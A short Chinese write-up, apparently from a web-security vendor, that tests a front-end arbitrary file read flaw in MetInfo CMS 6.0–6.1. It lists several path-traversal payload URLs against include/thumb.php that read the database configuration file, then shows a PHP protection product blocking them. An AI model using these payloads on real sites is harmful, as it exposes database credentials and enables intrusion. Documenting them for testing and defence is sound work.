米拓安全防护测试

前台任意文件读取漏洞

影响版本

6.0-6.1

漏洞测试

Payload:

http://mymetinfo.com/include/thumb.php?dir=.....///http/.....///confi

g/config_db.php

成功读取到了配置文件,可以更新版本进行漏洞防御,

也可以选择开启堡塔PHP安全防护进行漏洞拦截

重新发送漏洞包,已经成功拦截该恶意请求

因为版本不同使用的Payload不同,可以尝试一下其他的payload,看看会被拦截

http://mymetinfo.com/include/thumb.php?dir=..././http/..././config/config_db.php

http://mymetinfo.com/include/thumb.php?dir=http/.....///.....///config/config_db.php

http://mymetinfo.com/include/thumb.php?dir=http\..\..\config\config_db.php

可以说还是很强大的,此漏洞的所有版本都可以进行相应的拦截,如果此cms存在误报欢迎来反馈。